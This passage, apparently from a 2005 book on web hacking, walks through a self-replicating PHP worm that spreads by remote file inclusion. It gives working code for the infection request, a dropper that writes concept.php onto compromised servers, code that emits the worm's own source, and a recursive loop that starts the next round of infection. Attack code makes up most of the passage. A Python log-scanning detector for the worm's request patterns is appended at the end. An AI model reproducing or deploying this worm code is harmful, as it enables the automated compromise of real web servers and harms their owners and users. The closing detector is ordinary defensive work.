The Infection

The exploit($str) function takes one parameter: a string containing the URL of a page that may be vulnerable to PHP source code injection.

Within that argument, the placeholder [*STRING*] stands in for the value of the potentially vulnerable parameter.

In essence, attempting an infection is a matter of sending the request http://site1/test.php?aaa=http://site2/concept.php?&bbb=ccc instead of http://site1/test.php?aaa=[*STRING*]&bbb=ccc . Here, site1 is the URL of the site that the worm is trying to infect, and site2 is the address of the server hosting the file currently being executed.

So, the exploit() function could look as follows.


 function exploit($str) {
   global $_SERVER, $HTTP_SERVER_VARS;
   $th=$_SERVER["SCRIPT_URI"];
   if(empty($th)) $th=$HTTP_SERVER_VARS["SCRIPT_URI"];
   if(empty($th)) $th=getenv("SCRIPT_URI");   // Getting the URL of the site
   if(!preg_match("/domain\.com/", $str)) exit;
   $str=str_replace("[*STRING*]", "$th?", $str);
   $str.="&from=".$_SERVER["SCRIPT_URI"];
   file($str);   // Initialization is done
 }

Here, it is assumed that when the script (the concept.php file) is requested without parameters, it returns PHP code that will be executed on the server that included it.


 <?
 if(file_exists("concept.php")) exit;   // To avoid infecting one server repeatedly
 $f=fopen("concept.php", "w");
 $a="<? // The source code of exploit.php ?> ";
 fwrite($f, $a);
 $th=$_SERVER["SCRIPT_URI"];
 if(empty($th)) $th=$HTTP_SERVER_VARS["SCRIPT_URI"];
 if(empty($th)) $th=getenv("SCRIPT_URI");
 preg_match("/^(https?\:\/\/.*)\/(.*?)/", $th, $r);
 $a=$r[1]."/concept.php?expl=yes";
 file($a);
 ?>

It only remains to write the code that outputs this result.


 $tmpname="concept.php";
 echo "<? ";
 $th2=$_SERVER["SCRIPT_FILENAME"];
 if(empty($th2)) $th2=$HTTP_SERVER_VARS["SCRIPT_FILENAME"];
 if(empty($th2)) $th2=getenv("SCRIPT_FILENAME");
 echo " if(file_exists(\"$tmpname\")) exit;
 $f=fopen(\"$tmpname\", \"w\");
 $a=\"".str_replace("$","\$",addslashes(implode("", file($th2))))."\";
 fwrite($f, $a);
 $th=$_SERVER[\"SCRIPT_URI\"];
 if(empty($th)) $th=$HTTP_SERVER_VARS[\"SCRIPT_URI\"];
 if(empty($th)) $th=getenv(\"SCRIPT_URI\");
 preg_match(\"/^(https?\:\/\/.*)\/(.*?)/\", $th, $r);
 $a=$r[1].\"/$tmpname?expl=yes\";
 file($a);
 ?> ";
 ?>

Sending the request http://site/concept.php?expl=yes closes the loop, and reproduction starts over from the beginning.


 if($_GET["doexpl"]=="yes" || $HTTP_GET_VARS["doexpl"]=="yes") {
   global $c, $_GET, $HTTP_GET_VARS, $_SERVER, $HTTP_SERVER_VARS;
   initsettins();
   searchandexpl();   // The next iteration
   $countthis=(int)($_GET["countthis"] | $HTTP_GET_VARS["countthis"]);
   if($countthis==0) $countthis=$c;
   $countthis--;
   $th=$_SERVER["SCRIPT_URI"];
   if(empty($th)) $th=$HTTP_SERVER_VARS["SCRIPT_URI"];
   if(empty($th)) $th=getenv("SCRIPT_URI");
   if($countthis>=1) file("$th?doexpl=modeok&countthis=$countthis");
   exit;
 }
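The two request shapes this worm produces (a script parameter carrying a remote URL that ends in .php, and the concept.php?doexpl=... / countthis=... requests it sends to itself) are easy to pick out of a web server's access log. The following detector is an added example, not code from the book: the log lines are constructed, and the host names, the .php-suffix heuristic and the control parameter names are assumptions taken from the requests shown above.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Constructed sample access-log lines (not taken from the book). Lines 2 and 3
# mimic the request shapes the worm produces; lines 1 and 4 are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2005:13:55:36 +0000] "GET /test.php?aaa=page1&bbb=ccc HTTP/1.0" 200 512
203.0.113.7 - - [10/Oct/2005:13:55:37 +0000] "GET /test.php?aaa=http://site2.example/concept.php?&bbb=ccc&from=http://site2.example/concept.php HTTP/1.0" 200 17
203.0.113.7 - - [10/Oct/2005:13:55:38 +0000] "GET /concept.php?doexpl=yes&countthis=3 HTTP/1.0" 200 0
203.0.113.9 - - [10/Oct/2005:13:55:39 +0000] "GET /index.php?ref=https%3A%2F%2Fshop.example%2Fcart HTTP/1.0" 200 2048
"""

# Common Log Format: client, identity, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)'
)
REMOTE_PHP_RE = re.compile(r"^https?://.+\.php(\?|$)", re.I)
CONTROL_PARAMS = {"doexpl", "expl", "countthis"}   # names used by the worm's own requests

def classify(line):
    """Return the findings for one access-log line; an empty list means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlparse(m.group("path"))
    params = parse_qsl(url.query, keep_blank_values=True)
    findings = []
    for name, value in params:
        # A parameter whose value is a remote URL ending in .php is the
        # remote-inclusion shape the infection request relies on.
        if REMOTE_PHP_RE.match(value):
            findings.append(f"rfi-attempt param={name}")
    if url.path.endswith("/concept.php") and CONTROL_PARAMS & {n for n, _ in params}:
        # The dropper / next-iteration requests the worm sends to itself.
        findings.append("worm-control-request")
    return findings

def scan(log_text):
    """Return [(client_ip, findings)] for every flagged line in a log."""
    hits = []
    for line in log_text.splitlines():
        findings = classify(line)
        if findings:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), findings))
    return hits
```

The fourth sample line shows why the .php suffix check matters: an ordinary URL-valued parameter such as a referrer is not flagged.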

Hacker Web Exploitation Uncovered
ISBN: 1931769494
Year: 2005